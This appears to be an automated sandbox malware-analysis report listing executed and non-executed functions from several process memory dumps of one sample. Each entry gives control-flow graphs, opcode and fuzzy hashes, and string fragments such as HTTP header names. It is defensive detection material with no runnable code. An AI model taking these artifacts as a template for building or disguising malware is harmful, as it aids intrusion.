                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_2bb0000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
                                                                                                                                                                                          • Instruction ID: 881ccbb4178d83d91e9f8be86de86ec60904bfc76917cf811f3c849ce409cff5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
                                                                                                                                                                                          • Instruction Fuzzy Hash: FCF01C70588240EBEF433BB08C4D6ED36F9AF40745F0405D1AA8AAD4D5DEB095508E75
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 02BB4675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 136 2bb4675-2bb468d call 2bb3a1c 139 2bb468f-2bb4698 call 2bb3a6e 136->139 140 2bb469d-2bb46cd 136->140 139->140 143 2bb46d3-2bb46f5 140->143 144 2bb47e7-2bb47ec 140->144 143->144 146 2bb46fb-2bb4720 143->146 148 2bb4738-2bb475a 146->148 149 2bb4722-2bb4737 146->149 151 2bb47bf-2bb47c9 148->151 152 2bb475c-2bb477e 148->152 149->148 153 2bb47cb-2bb47dd call 2bb3673 151->153 154 2bb47e0-2bb47e5 151->154 152->151 158 2bb4780-2bb47a2 152->158 153->154 154->144 158->151 160 2bb47a4-2bb47bc 158->160 160->151
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000024.00000002.2922946963.0000000002BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_2bb0000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction ID: eeae6897e9e5b13bdf0dbc5be080434017d8e70745aec173b7e12ebb64ff84cf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction Fuzzy Hash: F04172B6600208BFEF125F65CC48BEEBFBAFF84704F1540A9EA44AA255D770D640CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02BB4674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 111 2bb4674-2bb4680 112 2bb468b-2bb468d 111->112 113 2bb4686 call 2bb3a1c 111->113 114 2bb468f-2bb4698 call 2bb3a6e 112->114 115 2bb469d-2bb46cd 112->115 113->112 114->115 118 2bb46d3-2bb46f5 115->118 119 2bb47e7-2bb47ec 115->119 118->119 121 2bb46fb-2bb4720 118->121 123 2bb4738-2bb475a 121->123 124 2bb4722-2bb4737 121->124 126 2bb47bf-2bb47c9 123->126 127 2bb475c-2bb477e 123->127 124->123 128 2bb47cb-2bb47dd call 2bb3673 126->128 129 2bb47e0-2bb47e5 126->129 127->126 133 2bb4780-2bb47a2 127->133 128->129 129->119 133->126 135 2bb47a4-2bb47bc 133->135 135->126
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000024.00000002.2922946963.0000000002BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_2bb0000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction ID: cff8848bbac9601d628c63a9cc5d5f078bb8476f2c89e010f1c0faf844853b50
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 434151B6600208BFEF129F65CC44BEEBBBAFF84704F1540A9EA44AA255D774D640CF94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 0256093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 0 256093e-256095f call 2560cc4 call 25614bc call 2563cc0 8 2560967-2560989 0->8 10 2560af1-2560af2 8->10 11 256098f-25609d2 call 25609d9 8->11 15 25609d4-25609d5 11->15 16 2560a3d-2560a80 11->16 17 25609d7-25609e8 call 2563653 15->17 18 2560a3c 15->18 21 2560a82-2560aae 16->21 22 2560aec call 2560af3 16->22 17->22 29 25609ee-2560a10 17->29 18->16 21->22 27 2560ab0-2560abc 21->27 22->10 32 2560ac1-2560ae5 27->32 29->22 33 2560a16-2560a3b 29->33 32->10 37 2560ae7-2560aea 32->37 33->18 33->22 37->22 37->32
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000025.00000002.2918581585.0000000002560000.00000040.00000001.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_37_2_2560000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction ID: 09dc2333d8d4fcaa15e7f2cf7b12593dbfa056a0ac124d39233c8a60f6178b2f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B5192315442549FEB125F20CC89BA97BB8FF04744F0401D9BA49FE0D6DBB09594CB69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 025614BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 38 25614bc-2561590 call 25614de call 2560c9c call 2561345 * 6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000025.00000002.2918581585.0000000002560000.00000040.00000001.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_37_2_2560000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 4e691a712de486e4dfceb288b4c3d9d3fe3d652e5e2e3b2f50e0e601de67137e
                                                                                                                                                                                          • Instruction ID: 810691f4088cfe0eceeb6d2154fe5a906a9c2d4cc68b6b523247cf5125fbdb44
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e691a712de486e4dfceb288b4c3d9d3fe3d652e5e2e3b2f50e0e601de67137e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4421FC72404A149EDF03AF60C9C88BA73ECFF80704F45496A9989EF049FA709554CEEA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02561345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 57 2561345-2561352 58 25613eb-25613ec 57->58 59 2561358-256135e 57->59 59->58 60 2561364-256137a 59->60 60->58 62 256137c-256138f 60->62 64 2561391-2561398 62->64 65 256139b-25613ab call 2560e7c 64->65 68 25613ad-25613e2 65->68 68->58
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000025.00000002.2918581585.0000000002560000.00000040.00000001.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_37_2_2560000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction ID: e184dcd04e2ea86b70576acf487860406f5cba3fa77103c64639da8fc2e0254d
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 17218E31A04216AFDF119EB8C848B6DBBB5BF44704F098215F959BF694D770A810CB98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 025614DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 69 25614de-2561590 call 2563653 call 2560c9c call 2561345 * 6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000025.00000002.2918581585.0000000002560000.00000040.00000001.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_37_2_2560000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: d4917235bce67b0bd341cc4376806be672fb8739d92a651c71d1172738683fcb
                                                                                                                                                                                          • Instruction ID: 943c53926dadd7442d80c6d8bdbbf5d3efaba073ec4d46f42844c546b385634a
                                                                                                                                                                                          • Opcode Fuzzy Hash: d4917235bce67b0bd341cc4376806be672fb8739d92a651c71d1172738683fcb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 24116C724049159EEF03AF60C5C88BA73EDBE80704B49496A9D8AEF449FE709154CEE9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02563F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 87 2563f0d-2563f29 call 2563653 call 256379f 92 2563f3b-2563f66 call 2563f78 * 3 87->92 93 2563f2b-2563f39 call 256401b 87->93 106 2563f71 92->106 101 2563f76-2563f77 93->101 106->101 107 2563f71 call 2563f78 106->107 107->101
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000025.00000002.2918581585.0000000002560000.00000040.00000001.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_37_2_2560000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                                          • Instruction ID: 0348ea5431a964ddec840662d61dde98bcb2874fccb64eb886c845a2cece5c85
                                                                                                                                                                                          • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EF01C70588251BEFF403BB0EC4D679BAB9BF80B05F0405D1AA89AF0D4DE7885508E79
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 02564674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 108 2564674-256468d call 2563a1c 111 256468f-2564698 call 2563a6e 108->111 112 256469d-25646cd 108->112 111->112 115 25647e7-25647ec 112->115 116 25646d3-25646f5 112->116 116->115 118 25646fb-2564720 116->118 120 2564722-2564737 118->120 121 2564738-256475a 118->121 120->121 123 25647bf-25647c9 121->123 124 256475c-256477e 121->124 125 25647e0-25647e5 123->125 126 25647cb-25647dd call 2563673 123->126 124->123 129 2564780-25647a2 124->129 125->115 126->125 129->123 132 25647a4-25647bc 129->132 132->123
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000025.00000002.2918581585.0000000002560000.00000040.00000001.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_37_2_2560000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction ID: b3b6c95c62378a6dc9f68629ed08885822c061f96b203e1b1adf131367f5386b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 614140B6500208BFEF229F65CC48BEEBFBAFF84704F154069EA44AB254D7349641CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02564675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 133 2564675-2564680 134 256468b-256468d 133->134 135 2564686 call 2563a1c 133->135 136 256468f-2564698 call 2563a6e 134->136 137 256469d-25646cd 134->137 135->134 136->137 140 25647e7-25647ec 137->140 141 25646d3-25646f5 137->141 141->140 143 25646fb-2564720 141->143 145 2564722-2564737 143->145 146 2564738-256475a 143->146 145->146 148 25647bf-25647c9 146->148 149 256475c-256477e 146->149 150 25647e0-25647e5 148->150 151 25647cb-25647dd call 2563673 148->151 149->148 154 2564780-25647a2 149->154 150->140 151->150 154->148 157 25647a4-25647bc 154->157 157->148
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000025.00000002.2918581585.0000000002560000.00000040.00000001.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_37_2_2560000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction ID: 308953973f8209882fcc4503d1814855b50d52206185d47a531162b6d4981d1c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A4151B6500208BFEF225F65CC48BEEBFBAFF84704F154069EA44AB254D7349651CB98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 0261093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 0 261093e-261095f call 2610cc4 call 26114bc call 2613cc0 8 2610967-2610989 0->8 10 2610af1-2610af2 8->10 11 261098f-26109d2 call 26109d9 8->11 15 26109d4-26109d5 11->15 16 2610a3d-2610a80 11->16 17 26109d7-26109e8 call 2613653 15->17 18 2610a3c 15->18 21 2610a82-2610aae 16->21 22 2610aec call 2610af3 16->22 17->22 29 26109ee-2610a10 17->29 18->16 21->22 27 2610ab0-2610abc 21->27 22->10 31 2610ac1-2610ae5 27->31 29->22 33 2610a16-2610a3b 29->33 31->10 37 2610ae7-2610aea 31->37 33->18 33->22 37->22 37->31
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000026.00000002.2918126920.0000000002610000.00000040.00000001.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_38_2_2610000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction ID: 38e8d43403301023bd5d3553e95f552aa788bc0d451a687b25f24b8c9d599e96
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction Fuzzy Hash: CD5170316442549FEF229F20CC85B9A77BCAF04744F0801D9AE49FE1D6DBB0A694CB69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 026114BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 38 26114bc-2611590 call 26114de call 2610c9c call 2611345 * 6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000026.00000002.2918126920.0000000002610000.00000040.00000001.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_38_2_2610000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                                          • Instruction ID: 0ac0d93b57e53a05831a6c2011854a4ded50daf56c42613b49e552d1d7a922f8
                                                                                                                                                                                          • Opcode Fuzzy Hash: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                                          • Instruction Fuzzy Hash: F6210E724046149EDF03AF60C9C9CA673ECEF40704F4905AA9E89EF44DFA70A154CEEA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02611345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 57 2611345-2611352 58 2611358-261135e 57->58 59 26113eb-26113ec 57->59 58->59 60 2611364-261137a 58->60 60->59 62 261137c-261138f 60->62 64 2611391-2611398 62->64 65 261139b-26113ab call 2610e7c 64->65 68 26113ad-26113e2 65->68 68->59
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000026.00000002.2918126920.0000000002610000.00000040.00000001.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_38_2_2610000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction ID: 7dd3b71c0fad22056f3125470013f62888aac05db5b7f2448e6f6f77de8bfd50
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F21D23190421AAFDF11DF78C844B5DBBB5AF05300F094255FE59BB694DB30E910CBA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 026114DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 69 26114de-2611590 call 2613653 call 2610c9c call 2611345 * 6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000026.00000002.2918126920.0000000002610000.00000040.00000001.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_38_2_2610000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                                          • Instruction ID: 89b7a79fbf2ef458897fa56da868425e91e9e2fe2bbb59277a3a08b447d72da4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                                          • Instruction Fuzzy Hash: F9114D724045149EEF03AF60C5C88AA73EDEF41704B4909AE9D89EF84DFE71A154CEE9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02613F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 87 2613f0d-2613f29 call 2613653 call 261379f 92 2613f3b-2613f66 call 2613f78 * 3 87->92 93 2613f2b-2613f39 call 261401b 87->93 106 2613f71 92->106 101 2613f76-2613f77 93->101 106->101 107 2613f71 call 2613f78 106->107 107->101
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000026.00000002.2918126920.0000000002610000.00000040.00000001.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_38_2_2610000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                                          • Instruction ID: 3396f4c1b5be3603443aa1a33f296464a591a1c8479f1e322987a9ad3d5b9a23
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                                          • Instruction Fuzzy Hash: DBF01270588240AEEF403F708C4965936B55F40745F0C05D5A94BAD2D5DE70A5608E79
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 02614675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 133 2614675-261468d call 2613a1c 136 261469d-26146cd 133->136 137 261468f-2614698 call 2613a6e 133->137 140 26146d3-26146f5 136->140 141 26147e7-26147ec 136->141 137->136 140->141 143 26146fb-2614720 140->143 145 2614722-2614737 143->145 146 2614738-261475a 143->146 145->146 148 261475c-261477e 146->148 149 26147bf-26147c9 146->149 148->149 155 2614780-26147a2 148->155 150 26147e0-26147e5 149->150 151 26147cb-26147dd call 2613673 149->151 150->141 151->150 155->149 157 26147a4-26147bc 155->157 157->149
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000026.00000002.2918126920.0000000002610000.00000040.00000001.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_38_2_2610000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction ID: b3cb3c4f63e0b407ba5f8b965c6d0f08294295d2a0ad10bcb294655027abf784
                                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction Fuzzy Hash: D84152B6500208BFEF129F65CC48BDEBFBAEF84704F154069EA44AB254DB34E650CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02614674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 108 2614674-2614680 109 261468b-261468d 108->109 110 2614686 call 2613a1c 108->110 111 261469d-26146cd 109->111 112 261468f-2614698 call 2613a6e 109->112 110->109 115 26146d3-26146f5 111->115 116 26147e7-26147ec 111->116 112->111 115->116 118 26146fb-2614720 115->118 120 2614722-2614737 118->120 121 2614738-261475a 118->121 120->121 123 261475c-261477e 121->123 124 26147bf-26147c9 121->124 123->124 130 2614780-26147a2 123->130 125 26147e0-26147e5 124->125 126 26147cb-26147dd call 2613673 124->126 125->116 126->125 130->124 132 26147a4-26147bc 130->132 132->124
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000026.00000002.2918126920.0000000002610000.00000040.00000001.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_38_2_2610000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction ID: e2e789765ac028bd15d13fc1cf74c23254a9551c2f6fa74ec02556714d13f02a
